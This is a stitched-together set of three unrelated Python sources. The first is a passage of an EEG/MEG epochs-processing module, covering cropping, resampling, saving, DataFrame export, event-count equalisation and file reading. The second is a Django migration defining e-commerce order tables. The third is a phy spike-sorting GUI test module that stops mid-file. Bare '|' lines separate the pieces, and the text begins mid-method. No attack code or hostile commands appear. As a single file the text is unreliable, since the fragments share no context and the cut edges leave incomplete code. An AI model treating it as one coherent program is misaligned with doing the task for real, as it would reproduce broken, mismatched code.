self._data, epochs._data = data, data
if isinstance(key, string_types):
key = [key]
if isinstance(key, list) and isinstance(key[0], string_types):
select = np.any(np.atleast_2d([epochs._key_match(k)
for k in key]), axis=0)
epochs.name = ('+'.join(key) if epochs.name == 'Unknown'
else 'epochs_%s' % '+'.join(key))
else:
select = key if isinstance(key, slice) else np.atleast_1d(key)
key_selection = epochs.selection[select]
for k in np.setdiff1d(epochs.selection, key_selection):
epochs.drop_log[k] = ['IGNORED']
epochs.selection = key_selection
epochs.events = np.atleast_2d(epochs.events[select])
if epochs.preload:
epochs._data = epochs._data[select]
# update event id to reflect new content of epochs
epochs.event_id = dict((k, v) for k, v in epochs.event_id.items()
if v in epochs.events[:, 2])
return epochs
def crop(self, tmin=None, tmax=None, copy=False):
"""Crops a time interval from epochs object.
Parameters
----------
tmin : float
Start time of selection in seconds.
tmax : float
End time of selection in seconds.
copy : bool
If False epochs is cropped in place.
Returns
-------
epochs : Epochs instance
The cropped epochs.
Note
----
Unlike Python slices, MNE time intervals include both their end points;
crop(tmin, tmax) returns the interval tmin <= t <= tmax.
"""
if not self.preload:
raise RuntimeError('Modifying data of epochs is only supported '
'when preloading is used. Use preload=True '
'in the constructor.')
if tmin is None:
tmin = self.tmin
elif tmin < self.tmin:
warnings.warn("tmin is not in epochs' time interval."
"tmin is set to epochs.tmin")
tmin = self.tmin
if tmax is None:
tmax = self.tmax
elif tmax > self.tmax:
warnings.warn("tmax is not in epochs' time interval."
"tmax is set to epochs.tmax")
tmax = self.tmax
tmask = (self.times >= tmin) & (self.times <= tmax)
tidx = np.where(tmask)[0]
this_epochs = self if not copy else self.copy()
this_epochs.tmin = this_epochs.times[tidx[0]]
this_epochs.tmax = this_epochs.times[tidx[-1]]
this_epochs.times = this_epochs.times[tmask]
this_epochs._data = this_epochs._data[:, :, tmask]
return this_epochs
@verbose
def resample(self, sfreq, npad=100, window='boxcar', n_jobs=1,
verbose=None):
"""Resample preloaded data
Parameters
----------
sfreq : float
New sample rate to use
npad : int
Amount to pad the start and end of the data.
window : string or tuple
Window to use in resampling. See scipy.signal.resample.
n_jobs : int
Number of jobs to run in parallel.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to self.verbose.
Notes
-----
For some data, it may be more accurate to use npad=0 to reduce
artifacts. This is dataset dependent -- check your data!
"""
if self.preload:
o_sfreq = self.info['sfreq']
self._data = resample(self._data, sfreq, o_sfreq, npad,
n_jobs=n_jobs)
# adjust indirectly affected variables
self.info['sfreq'] = sfreq
self.times = (np.arange(self._data.shape[2], dtype=np.float)
/ sfreq + self.times[0])
else:
raise RuntimeError('Can only resample preloaded data')
def copy(self):
"""Return copy of Epochs instance"""
raw = self.raw
del self.raw
new = cp.deepcopy(self)
self.raw = raw
new.raw = raw
return new
def save(self, fname):
"""Save epochs in a fif file
Parameters
----------
fname : str
The name of the file.
"""
# Create the file and save the essentials
fid = start_file(fname)
start_block(fid, FIFF.FIFFB_MEAS)
write_id(fid, FIFF.FIFF_BLOCK_ID)
if self.info['meas_id'] is not None:
write_id(fid, FIFF.FIFF_PARENT_BLOCK_ID, self.info['meas_id'])
# Write measurement info
write_meas_info(fid, self.info)
# One or more evoked data sets
start_block(fid, FIFF.FIFFB_PROCESSED_DATA)
start_block(fid, FIFF.FIFFB_EPOCHS)
# write events out after getting data to ensure bad events are dropped
data = self.get_data()
start_block(fid, FIFF.FIFFB_MNE_EVENTS)
write_int(fid, FIFF.FIFF_MNE_EVENT_LIST, self.events.T)
mapping_ = ';'.join([k + ':' + str(v) for k, v in
self.event_id.items()])
write_string(fid, FIFF.FIFF_DESCRIPTION, mapping_)
end_block(fid, FIFF.FIFFB_MNE_EVENTS)
# First and last sample
first = int(self.times[0] * self.info['sfreq'])
last = first + len(self.times) - 1
write_int(fid, FIFF.FIFF_FIRST_SAMPLE, first)
write_int(fid, FIFF.FIFF_LAST_SAMPLE, last)
# save baseline
if self.baseline is not None:
bmin, bmax = self.baseline
bmin = self.times[0] if bmin is None else bmin
bmax = self.times[-1] if bmax is None else bmax
write_float(fid, FIFF.FIFF_MNE_BASELINE_MIN, bmin)
write_float(fid, FIFF.FIFF_MNE_BASELINE_MAX, bmax)
# The epochs itself
decal = np.empty(self.info['nchan'])
for k in range(self.info['nchan']):
decal[k] = 1.0 / (self.info['chs'][k]['cal']
* self.info['chs'][k].get('scale', 1.0))
data *= decal[np.newaxis, :, np.newaxis]
write_float_matrix(fid, FIFF.FIFF_EPOCH, data)
# undo modifications to data
data /= decal[np.newaxis, :, np.newaxis]
write_string(fid, FIFF.FIFFB_MNE_EPOCHS_DROP_LOG,
json.dumps(self.drop_log))
write_int(fid, FIFF.FIFFB_MNE_EPOCHS_SELECTION,
self.selection)
end_block(fid, FIFF.FIFFB_EPOCHS)
end_block(fid, FIFF.FIFFB_PROCESSED_DATA)
end_block(fid, FIFF.FIFFB_MEAS)
end_file(fid)
def as_data_frame(self, picks=None, index=None, scale_time=1e3,
scalings=None, copy=True):
"""Get the epochs as Pandas DataFrame
Export epochs data in tabular structure with MEG channels as columns
and three additional info columns 'epoch', 'condition', and 'time'.
The format matches a long table format commonly used to represent
repeated measures in within-subject designs.
Parameters
----------
picks : None | array of int
If None, only MEG and EEG channels are kept,
otherwise the channel indices in picks are kept.
index : tuple of str | None
Column to be used as index for the data. Valid string options
are 'epoch', 'time' and 'condition'. If None, all three info
columns will be included in the table as categorical data.
scale_time : float
Scaling to be applied to time units.
scalings : dict | None
Scaling to be applied to the channels picked. If None, defaults to
``scalings=dict(eeg=1e6, grad=1e13, mag=1e15, misc=1.0)``.
copy : bool
If True, data will be copied. Otherwise data may be modified in place.
Returns
-------
df : instance of pandas.core.DataFrame
Epochs exported into tabular data structure.
"""
pd = _check_pandas_installed()
default_index = ['condition', 'epoch', 'time']
if index is not None:
_check_pandas_index_arguments(index, default_index)
else:
index = default_index
if picks is None:
picks = list(range(self.info['nchan']))
else:
if not in1d(picks, np.arange(self.info['nchan'])).all():
raise ValueError('At least one picked channel is not present '
'in this epochs instance.')
data = self.get_data()[:, picks, :]
shape = data.shape
data = np.hstack(data).T
if copy:
data = data.copy()
types = [channel_type(self.info, idx) for idx in picks]
n_channel_types = 0
ch_types_used = []
scalings = _mutable_defaults(('scalings', scalings))[0]
for t in scalings.keys():
if t in types:
n_channel_types += 1
ch_types_used.append(t)
for t in ch_types_used:
scaling = scalings[t]
idx = [picks[i] for i in range(len(picks)) if types[i] == t]
if len(idx) > 0:
data[:, idx] *= scaling
id_swapped = dict((v, k) for k, v in self.event_id.items())
names = [id_swapped[k] for k in self.events[:, 2]]
mindex = list()
mindex.append(('condition', np.repeat(names, shape[2])))
mindex.append(('time', np.tile(self.times, shape[0]) *
scale_time))
mindex.append(('epoch', np.repeat(np.arange(shape[0]),
shape[2])))
assert all(len(mdx) == len(mindex[0]) for mdx in mindex)
col_names = [self.ch_names[k] for k in picks]
df = pd.DataFrame(data, columns=col_names)
[df.insert(i, k, v) for i, (k, v) in enumerate(mindex)]
if index is not None:
with warnings.catch_warnings(record=True):
if 'time' in index:
df['time'] = df['time'].astype(np.int64)
df.set_index(index, inplace=True)
return df
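# Illustrative usage sketch (a hypothetical add-on, not part of the method
# above): assuming ``epochs`` is an Epochs instance, the long-format table
# combines naturally with pandas group-by operations, e.g. averaging every
# channel within each condition:
#
#     df = epochs.as_data_frame()
#     per_condition_mean = df.groupby(level='condition').mean()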
def to_nitime(self, picks=None, epochs_idx=None, collapse=False,
copy=True, first_samp=0):
""" Export epochs as nitime TimeSeries
Parameters
----------
picks : array-like | None
Indices for exporting subsets of the epochs channels. If None
all good channels will be used.
epochs_idx : slice | array-like | None
Epochs index for single or selective epochs exports. If None, all
epochs will be used.
collapse : boolean
If True, epochs and time slices will be collapsed to a 2D
array. This may be required by some nitime functions.
copy : boolean
If True, exports a copy of the epochs data.
first_samp : int
Number of samples to offset the times by. Use raw.first_samp to
have the time returned relative to the session onset, or zero
(default) for time relative to the recording onset.
Returns
-------
epochs_ts : instance of nitime.TimeSeries
The Epochs as nitime TimeSeries object.
"""
try:
from nitime import TimeSeries # to avoid strong dependency
except ImportError:
raise Exception('the nitime package is missing')
if picks is None:
picks = pick_types(self.info, include=self.ch_names,
exclude='bads')
if epochs_idx is None:
epochs_idx = slice(len(self.events))
data = self.get_data()[epochs_idx, picks]
if copy is True:
data = data.copy()
if collapse is True:
data = np.hstack(data).copy()
offset = _time_as_index(abs(self.tmin), self.info['sfreq'],
first_samp, True)
t0 = _index_as_time(self.events[0, 0] - offset, self.info['sfreq'],
first_samp, True)[0]
epochs_ts = TimeSeries(data, sampling_rate=self.info['sfreq'], t0=t0)
epochs_ts.ch_names = np.array(self.ch_names)[picks].tolist()
return epochs_ts
def equalize_event_counts(self, event_ids, method='mintime', copy=True):
"""Equalize the number of trials in each condition
It tries to make the remaining epochs occur as close as possible in
time. This method works based on the idea that if there happened to be
some time-varying (like on the scale of minutes) noise characteristics
during a recording, they could be compensated for (to some extent) in
the equalization process. This method thus seeks to reduce any of
those effects by minimizing the differences in the times of the events
in the two sets of epochs. For example, if one had event times
[1, 2, 3, 4, 120, 121] and the other one had [3.5, 4.5, 120.5, 121.5],
it would remove events at times [1, 2] in the first epochs and not
the events at times [120, 121].
Parameters
----------
event_ids : list
The event types to equalize. Each entry in the list can either be
a str (single event) or a list of str. In the case where one of
the entries is a list of str, event_ids in that list will be
grouped together before equalizing trial counts across conditions.
method : str
If 'truncate', events will be truncated from the end of each event
list. If 'mintime', timing differences between each event list will
be minimized.
copy : bool
If True, a copy of epochs will be returned. Otherwise, the
function will operate in-place.
Returns
-------
epochs : instance of Epochs
The modified Epochs instance.
indices : array of int
Indices from the original events list that were dropped.
Notes
-----
For example (if epochs.event_id was {'Left': 1, 'Right': 2,
'Nonspatial': 3}):
epochs.equalize_event_counts([['Left', 'Right'], 'Nonspatial'])
would equalize the number of trials in the 'Nonspatial' condition with
the total number of trials in the 'Left' and 'Right' conditions.
"""
if copy is True:
epochs = self.copy()
else:
epochs = self
if len(event_ids) == 0:
raise ValueError('event_ids must have at least one element')
if not epochs._bad_dropped:
epochs.drop_bad_epochs()
# figure out how to equalize
eq_inds = list()
for eq in event_ids:
eq = np.atleast_1d(eq)
# eq is now a list of types
key_match = np.zeros(epochs.events.shape[0])
for key in eq:
key_match = np.logical_or(key_match, epochs._key_match(key))
eq_inds.append(np.where(key_match)[0])
event_times = [epochs.events[eq, 0] for eq in eq_inds]
indices = _get_drop_indices(event_times, method)
# need to re-index indices
indices = np.concatenate([eq[inds]
for eq, inds in zip(eq_inds, indices)])
epochs.drop_epochs(indices, reason='EQUALIZED_COUNT')
# actually remove the indices
return epochs, indices
def combine_event_ids(epochs, old_event_ids, new_event_id, copy=True):
"""Collapse event_ids from an epochs instance into a new event_id
Parameters
----------
epochs : instance of Epochs
The epochs to operate on.
old_event_ids : str, or list
Conditions to collapse together.
new_event_id : dict, or int
A one-element dict (or a single integer) for the new
condition. Note that for safety, this cannot be any
existing id (in epochs.event_id.values()).
copy : bool
If True, a copy of epochs will be returned. Otherwise, the
function will operate in-place.
Notes
-----
For example (if epochs.event_id was {'Left': 1, 'Right': 2}):
combine_event_ids(epochs, ['Left', 'Right'], {'Directional': 12})
would create a 'Directional' entry in epochs.event_id replacing
'Left' and 'Right' (combining their trials).
"""
if copy:
epochs = epochs.copy()
old_event_ids = np.asanyarray(old_event_ids)
if isinstance(new_event_id, int):
new_event_id = {str(new_event_id): new_event_id}
else:
if not isinstance(new_event_id, dict):
raise ValueError('new_event_id must be a dict or int')
if not len(list(new_event_id.keys())) == 1:
raise ValueError('new_event_id dict must have one entry')
new_event_num = list(new_event_id.values())[0]
if not isinstance(new_event_num, int):
raise ValueError('new_event_id value must be an integer')
if new_event_num in epochs.event_id.values():
raise ValueError('new_event_id value must not already exist')
# could use .pop() here, but if a later one doesn't exist, we're
# in trouble, so run them all here and pop() later
old_event_nums = np.array([epochs.event_id[key] for key in old_event_ids])
# find the ones to replace
inds = np.any(epochs.events[:, 2][:, np.newaxis] ==
old_event_nums[np.newaxis, :], axis=1)
# replace the event numbers in the events list
epochs.events[inds, 2] = new_event_num
# delete old entries
[epochs.event_id.pop(key) for key in old_event_ids]
# add the new entry
epochs.event_id.update(new_event_id)
return epochs
def equalize_epoch_counts(epochs_list, method='mintime'):
"""Equalize the number of trials in multiple Epoch instances
It tries to make the remaining epochs occur as close as possible in
time. This method works based on the idea that if there happened to be some
time-varying (like on the scale of minutes) noise characteristics during
a recording, they could be compensated for (to some extent) in the
equalization process. This method thus seeks to reduce any of those effects
by minimizing the differences in the times of the events in the two sets of
epochs. For example, if one had event times [1, 2, 3, 4, 120, 121] and the
other one had [3.5, 4.5, 120.5, 121.5], it would remove events at times
[1, 2] in the first epochs and not the events at times [120, 121].
Note that this operates on the Epochs instances in-place.
Example:
equalize_epoch_counts([epochs1, epochs2])
Parameters
----------
epochs_list : list of Epochs instances
The Epochs instances to equalize trial counts for.
method : str
If 'truncate', events will be truncated from the end of each event
list. If 'mintime', timing differences between each event list will be
minimized.
"""
if not all([isinstance(e, Epochs) for e in epochs_list]):
raise ValueError('All inputs must be Epochs instances')
# make sure bad epochs are dropped
[e.drop_bad_epochs() if not e._bad_dropped else None for e in epochs_list]
event_times = [e.events[:, 0] for e in epochs_list]
indices = _get_drop_indices(event_times, method)
for e, inds in zip(epochs_list, indices):
e.drop_epochs(inds, reason='EQUALIZED_COUNT')
def _get_drop_indices(event_times, method):
"""Helper to get indices to drop from multiple event timing lists"""
small_idx = np.argmin([e.shape[0] for e in event_times])
small_e_times = event_times[small_idx]
if method not in ['mintime', 'truncate']:
raise ValueError('method must be either mintime or truncate, not '
'%s' % method)
indices = list()
for e in event_times:
if method == 'mintime':
mask = _minimize_time_diff(small_e_times, e)
else:
mask = np.ones(e.shape[0], dtype=bool)
mask[small_e_times.shape[0]:] = False
indices.append(np.where(np.logical_not(mask))[0])
return indices
def _minimize_time_diff(t_shorter, t_longer):
"""Find a boolean mask to minimize timing differences"""
keep = np.ones((len(t_longer)), dtype=bool)
scores = np.ones((len(t_longer)))
for _ in range(len(t_longer) - len(t_shorter)):
scores.fill(np.inf)
# Check every possible removal to see if it minimizes
for idx in np.where(keep)[0]:
keep[idx] = False
scores[idx] = _area_between_times(t_shorter, t_longer[keep])
keep[idx] = True
keep[np.argmin(scores)] = False
return keep
def _area_between_times(t1, t2):
"""Quantify the difference between two timing sets"""
x1 = list(range(len(t1)))
x2 = list(range(len(t2)))
xs = np.concatenate((x1, x2))
return np.sum(np.abs(np.interp(xs, x1, t1) - np.interp(xs, x2, t2)))
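# Hypothetical sketch of the helpers above, reusing the event times quoted in
# the equalize_event_counts docstring: with 'mintime', the longer list keeps the
# events that line up best with the shorter one, so its early events get dropped.
#
#     t_long = np.array([1., 2., 3., 4., 120., 121.])
#     t_short = np.array([3.5, 4.5, 120.5, 121.5])
#     drop_long, drop_short = _get_drop_indices([t_long, t_short], 'mintime')
#     # drop_long -> indices of the events at times 1 and 2; drop_short -> empty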
@verbose
def _is_good(e, ch_names, channel_type_idx, reject, flat, full_report=False,
ignore_chs=[], verbose=None):
"""Test if data segment e is good according to the criteria
defined in reject and flat. If full_report=True, it will give
True/False as well as a list of all offending channels.
"""
bad_list = list()
has_printed = False
checkable = np.ones(len(ch_names), dtype=bool)
checkable[np.array([c in ignore_chs
for c in ch_names], dtype=bool)] = False
for refl, f, t in zip([reject, flat], [np.greater, np.less], ['', 'flat']):
if refl is not None:
for key, thresh in six.iteritems(refl):
idx = channel_type_idx[key]
name = key.upper()
if len(idx) > 0:
e_idx = e[idx]
deltas = np.max(e_idx, axis=1) - np.min(e_idx, axis=1)
checkable_idx = checkable[idx]
idx_deltas = np.where(np.logical_and(f(deltas, thresh),
checkable_idx))[0]
if len(idx_deltas) > 0:
ch_name = [ch_names[idx[i]] for i in idx_deltas]
if (not has_printed):
logger.info(' Rejecting %s epoch based on %s : '
'%s' % (t, name, ch_name))
has_printed = True
if not full_report:
return False
else:
bad_list.extend(ch_name)
if not full_report:
return True
else:
if bad_list == []:
return True, None
else:
return False, bad_list
@verbose
def read_epochs(fname, proj=True, add_eeg_ref=True, verbose=None):
"""Read epochs from a fif file
Parameters
----------
fname : str
The name of the file.
proj : bool | 'delayed'
Apply SSP projection vectors. If proj is 'delayed' and reject is not
None the single epochs will be projected before the rejection
decision, but used in unprojected state if they are kept.
This way deciding which projection vectors are good can be postponed
to the evoked stage without resulting in lower epoch counts and
without producing results different from early SSP application
given comparable parameters. Note that in this case baselining,
detrending and temporal decimation will be postponed.
If proj is False no projections will be applied which is the
recommended value if SSPs are not used for cleaning the data.
add_eeg_ref : bool
If True, an EEG average reference will be added (unless one
already exists).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to raw.verbose.
Returns
-------
epochs : instance of Epochs
The epochs
"""
epochs = Epochs(None, None, None, None, None)
logger.info('Reading %s ...' % fname)
fid, tree, _ = fiff_open(fname)
# Read the measurement info
info, meas = read_meas_info(fid, tree)
info['filename'] = fname
events, mappings = _read_events_fif(fid, tree)
# Locate the data of interest
processed = dir_tree_find(meas, FIFF.FIFFB_PROCESSED_DATA)
if len(processed) == 0:
fid.close()
raise ValueError('Could not find processed data')
epochs_node = dir_tree_find(tree, FIFF.FIFFB_EPOCHS)
if len(epochs_node) == 0:
fid.close()
raise ValueError('Could not find epochs data')
my_epochs = epochs_node[0]
# Now find the data in the block
comment = None
data = None
bmin, bmax = None, None
baseline = None
selection = None
drop_log = []
for k in range(my_epochs['nent']):
kind = my_epochs['directory'][k].kind
pos = my_epochs['directory'][k].pos
if kind == FIFF.FIFF_FIRST_SAMPLE:
tag = read_tag(fid, pos)
first = int(tag.data)
elif kind == FIFF.FIFF_LAST_SAMPLE:
tag = read_tag(fid, pos)
last = int(tag.data)
elif kind == FIFF.FIFF_COMMENT:
tag = read_tag(fid, pos)
comment = tag.data
elif kind == FIFF.FIFF_EPOCH:
tag = read_tag(fid, pos)
data = tag.data.astype(np.float)
elif kind == FIFF.FIFF_MNE_BASELINE_MIN:
tag = read_tag(fid, pos)
bmin = float(tag.data)
elif kind == FIFF.FIFF_MNE_BASELINE_MAX:
tag = read_tag(fid, pos)
bmax = float(tag.data)
elif kind == FIFF.FIFFB_MNE_EPOCHS_SELECTION:
tag = read_tag(fid, pos)
selection = np.array(tag.data)
elif kind == FIFF.FIFFB_MNE_EPOCHS_DROP_LOG:
tag = read_tag(fid, pos)
drop_log = json.loads(tag.data)
if bmin is not None or bmax is not None:
baseline = (bmin, bmax)
nsamp = last - first + 1
logger.info(' Found the data of interest:')
logger.info(' t = %10.2f ... %10.2f ms (%s)'
% (1000 * first / info['sfreq'],
1000 * last / info['sfreq'], comment))
if info['comps'] is not None:
logger.info(' %d CTF compensation matrices available'
% len(info['comps']))
# Read the data
if data is None:
raise ValueError('Epochs data not found')
if data.shape[2] != nsamp:
fid.close()
raise ValueError('Incorrect number of samples (%d instead of %d)'
% (data.shape[2], nsamp))
# Calibrate
cals = np.array([info['chs'][k]['cal'] * info['chs'][k].get('scale', 1.0)
for k in range(info['nchan'])])
data *= cals[np.newaxis, :, np.newaxis]
times = np.arange(first, last + 1, dtype=np.float) / info['sfreq']
tmin = times[0]
tmax = times[-1]
# Put it all together
epochs.preload = True
epochs.raw = None
epochs.picks = np.arange(data.shape[1])
epochs._bad_dropped = True
epochs.events = events
epochs._data = data
epochs.info = info
epochs.tmin = tmin
epochs.tmax = tmax
epochs.name = comment
epochs.times = times
epochs._data = data
epochs.proj = proj
activate = False if epochs._check_delayed() else proj
epochs._projector, epochs.info = setup_proj(info, add_eeg_ref,
activate=activate)
epochs.baseline = baseline
epochs.event_id = (dict((str(e), e) for e in np.unique(events[:, 2]))
if mappings is None else mappings)
epochs.verbose = verbose
# In case epochs didn't have a FIFF.FIFFB_MNE_EPOCHS_SELECTION tag
# (version < 0.8):
if selection is None:
selection = range(len(epochs))
epochs.selection = selection
epochs.drop_log = drop_log
fid.close()
return epochs
def bootstrap(epochs, random_state=None):
"""Compute epochs selected by bootstrapping
Parameters
----------
epochs : Epochs instance
epochs data to be bootstrapped
random_state : None | int | np.random.RandomState
To specify the random generator state
Returns
-------
epochs : Epochs instance
The bootstrap samples
"""
if not epochs.preload:
raise RuntimeError('Modifying data of epochs is only supported '
'when preloading is used. Use preload=True '
'in the constructor.')
rng = check_random_state(random_state)
epochs_bootstrap = epochs.copy()
n_events = len(epochs_bootstrap.events)
idx = rng.randint(0, n_events, n_events)
epochs_bootstrap = epochs_bootstrap[idx]
return epochs_bootstrap
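# Hedged end-to-end sketch (``raw`` and ``events`` are placeholders, not defined
# in this module), assuming the usual constructor signature
# Epochs(raw, events, event_id, tmin, tmax, ...):
#
#     epochs = Epochs(raw, events, event_id={'aud': 1, 'vis': 2}, tmin=-0.2,
#                     tmax=0.5, baseline=(None, 0), preload=True)
#     epochs.drop_bad_epochs()
#     epochs.resample(100)
#     data = epochs.get_data()          # shape (n_epochs, n_channels, n_times)
#     boot = bootstrap(epochs, random_state=0)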
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('user', '0001_initial'),
('goods', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='OrderGoods',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateTimeField(verbose_name='更新时间', auto_now=True)),
('id_delete', models.BooleanField(verbose_name='删除标记', default=False)),
('count', models.IntegerField(verbose_name='商品数目', default=1)),
('price', models.DecimalField(max_digits=10, verbose_name='商品价格', decimal_places=2)),
('comment', models.CharField(verbose_name='评论', max_length=256)),
],
options={
'verbose_name': '订单商品',
'verbose_name_plural': '订单商品',
'db_table': 'df_order_goods',
},
),
migrations.CreateModel(
name='OrderInfo',
fields=[
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateTimeField(verbose_name='更新时间', auto_now=True)),
('id_delete', models.BooleanField(verbose_name='删除标记', default=False)),
('order_id', models.CharField(serialize=False, verbose_name='订单id', max_length=128, primary_key=True)),
('pay_method', models.SmallIntegerField(verbose_name='支付方式', choices=[(1, '货到付款'), (2, '微信支付'), (3, '支付宝'), (4, '银联支付')], default=3)),
('total_count', models.IntegerField(verbose_name='商品数量', default=1)),
('total_price', models.DecimalField(max_digits=10, verbose_name='商品总价', decimal_places=2)),
('transit_price', models.DecimalField(max_digits=10, verbose_name='订单运费', decimal_places=2)),
('order_status', models.SmallIntegerField(verbose_name='订单状态', choices=[(1, '待支付'), (2, '待发货'), (3, '待收货'), (4, '待评价'), (5, '已完成')], default=1)),
('trade_no', models.CharField(verbose_name='支付编号', max_length=128)),
('addr', models.ForeignKey(to='user.Address', verbose_name='地址')),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, verbose_name='用户')),
],
options={
'verbose_name': '订单',
'verbose_name_plural': '订单',
'db_table': 'df_order_info',
},
),
migrations.AddField(
model_name='ordergoods',
name='order',
field=models.ForeignKey(to='order.OrderInfo', verbose_name='订单'),
),
migrations.AddField(
model_name='ordergoods',
name='sku',
field=models.ForeignKey(to='goods.GoodsSKU', verbose_name='商品SKU'),
),
]
|
# -*- coding: utf-8 -*-
"""Integration tests for the GUIs."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
from itertools import cycle, islice
import logging
import os
from pathlib import Path
import shutil
import tempfile
import unittest
import numpy as np
from pytestqt.plugin import QtBot
from phylib.io.mock import (
artificial_features, artificial_traces, artificial_spike_clusters, artificial_spike_samples,
artificial_waveforms
)
from phylib.utils import connect, unconnect, Bunch, reset, emit
from phy.cluster.views import (
WaveformView, FeatureView, AmplitudeView, TraceView, TemplateView,
)
from phy.gui.qt import Debouncer, create_app
from phy.gui.widgets import Barrier
from phy.plot.tests import mouse_click
from ..base import BaseController, WaveformMixin, FeatureMixin, TraceMixin, TemplateMixin
logger = logging.getLogger(__name__)
#------------------------------------------------------------------------------
# Mock models and controller classes
#------------------------------------------------------------------------------
class MyModel(object):
seed = np.random.seed(0)
n_channels = 8
n_spikes = 20000
n_clusters = 32
n_templates = n_clusters
n_pcs = 5
n_samples_waveforms = 100
channel_positions = np.random.normal(size=(n_channels, 2))
channel_mapping = np.arange(0, n_channels)
channel_shanks = np.zeros(n_channels, dtype=np.int32)
features = artificial_features(n_spikes, n_channels, n_pcs)
metadata = {'group': {3: 'noise', 4: 'mua', 5: 'good'}}
sample_rate = 10000
spike_attributes = {}
amplitudes = np.random.normal(size=n_spikes, loc=1, scale=.1)
spike_clusters = artificial_spike_clusters(n_spikes, n_clusters)
spike_templates = spike_clusters
spike_samples = artificial_spike_samples(n_spikes)
spike_times = spike_samples / sample_rate
spike_times_reordered = artificial_spike_samples(n_spikes) / sample_rate
duration = spike_times[-1]
spike_waveforms = None
traces = artificial_traces(int(sample_rate * duration), n_channels)
def _get_some_channels(self, offset, size):
return list(islice(cycle(range(self.n_channels)), offset, offset + size))
def get_features(self, spike_ids, channel_ids):
return artificial_features(len(spike_ids), len(channel_ids), self.n_pcs)
def get_waveforms(self, spike_ids, channel_ids):
n_channels = len(channel_ids) if channel_ids else self.n_channels
return artificial_waveforms(len(spike_ids), self.n_samples_waveforms, n_channels)
def get_template(self, template_id):
nc = self.n_channels // 2
return Bunch(
template=artificial_waveforms(1, self.n_samples_waveforms, nc)[0, ...],
channel_ids=self._get_some_channels(template_id, nc))
def save_spike_clusters(self, spike_clusters):
pass
def save_metadata(self, name, values):
pass
class MyController(BaseController):
"""Default controller."""
def get_best_channels(self, cluster_id):
return self.model._get_some_channels(cluster_id, 5)
def get_channel_amplitudes(self, cluster_id):
return self.model._get_some_channels(cluster_id, 5), np.ones(5)
class MyControllerW(WaveformMixin, MyController):
"""With waveform view."""
pass
class MyControllerF(FeatureMixin, MyController):
"""With feature view."""
pass
class MyControllerT(TraceMixin, MyController):
"""With trace view."""
pass
class MyControllerTmp(TemplateMixin, MyController):
"""With templates."""
pass
class MyControllerFull(TemplateMixin, WaveformMixin, FeatureMixin, TraceMixin, MyController):
"""With everything."""
pass
def _mock_controller(tempdir, cls):
model = MyModel()
return cls(
dir_path=tempdir, config_dir=tempdir / 'config', model=model,
clear_cache=True, enable_threading=False)
#------------------------------------------------------------------------------
# Base classes
#------------------------------------------------------------------------------
class MinimalControllerTests(object):
# Methods to override
#--------------------------------------------------------------------------
@classmethod
def get_controller(cls, tempdir):
raise NotImplementedError()
# Convenient properties
#--------------------------------------------------------------------------
@property
def qtbot(self):
return self.__class__._qtbot
@property
def controller(self):
return self.__class__._controller
@property
def model(self):
return self.__class__._controller.model
@property
def supervisor(self):
return self.controller.supervisor
@property
def cluster_view(self):
return self.supervisor.cluster_view
@property
def similarity_view(self):
return self.supervisor.similarity_view
@property
def cluster_ids(self):
return self.supervisor.clustering.cluster_ids
@property
def gui(self):
return self.__class__._gui
@property
def selected(self):
return self.supervisor.selected
@property
def amplitude_view(self):
return self.gui.list_views(AmplitudeView)[0]
# Convenience methods
#--------------------------------------------------------------------------
def stop(self): # pragma: no cover
"""Used for debugging."""
create_app().exec_()
self.gui.close()
def next(self):
s = self.supervisor
s.select_actions.next()
s.block()
def next_best(self):
s = self.supervisor
s.select_actions.next_best()
s.block()
def label(self, name, value):
s = self.supervisor
s.actions.label(name, value)
s.block()
def merge(self):
s = self.supervisor
s.actions.merge()
s.block()
def split(self):
s = self.supervisor
s.actions.split()
s.block()
def undo(self):
s = self.supervisor
s.actions.undo()
s.block()
def redo(self):
s = self.supervisor
s.actions.redo()
s.block()
def move(self, w):
s = self.supervisor
getattr(s.actions, 'move_%s' % w)()
s.block()
def lasso(self, view, scale=1.):
w, h = view.canvas.get_size()
w *= scale
h *= scale
mouse_click(self.qtbot, view.canvas, (1, 1), modifiers=('Control',))
mouse_click(self.qtbot, view.canvas, (w - 1, 1), modifiers=('Control',))
mouse_click(self.qtbot, view.canvas, (w - 1, h - 1), modifiers=('Control',))
mouse_click(self.qtbot, view.canvas, (1, h - 1), modifiers=('Control',))
# Fixtures
#--------------------------------------------------------------------------
@classmethod
def setUpClass(cls):
Debouncer.delay = 1
cls._qtbot = QtBot(create_app())
cls._tempdir_ = tempfile.mkdtemp()
cls._tempdir = Path(cls._tempdir_)
cls._controller = cls.get_controller(cls._tempdir)
cls._create_gui()
@classmethod
def tearDownClass(cls):
if os.environ.get('PHY_TEST_STOP', None): # pragma: no cover
cls._qtbot.stop()
cls._close_gui()
shutil.rmtree(cls._tempdir_)
@classmethod
def _create_gui(cls):
cls._gui = cls._controller.create_gui(do_prompt_save=False)
s = cls._controller.supervisor
b = Barrier()
connect(b('cluster_view'), event='ready', sender=s.cluster_view)
connect(b('similarity_view'), event='ready', sender=s.similarity_view)
cls._gui.show()
# cls._qtbot.addWidget(cls._gui)
cls._qtbot.waitForWindowShown(cls._gui)
b.wait()
@classmethod
def _close_gui(cls):
cls._gui.close()
cls._gui.deleteLater()
# NOTE: make sure all callback functions are unconnected at the end of the tests
# to avoid side-effects and spurious dependencies between tests.
reset()
class BaseControllerTests(MinimalControllerTests):
# Common test methods
#--------------------------------------------------------------------------
def test_common_01(self):
"""Select one cluster."""
self.next_best()
self.assertEqual(len(self.selected), 1)
def test_common_02(self):
"""Select one similar cluster."""
self.next()
self.assertEqual(len(self.selected), 2)
def test_common_03(self):
"""Select another similar cluster."""
self.next()
self.assertEqual(len(self.selected), 2)
def test_common_04(self):
"""Merge the selected clusters."""
self.merge()
self.assertEqual(len(self.selected), 1)
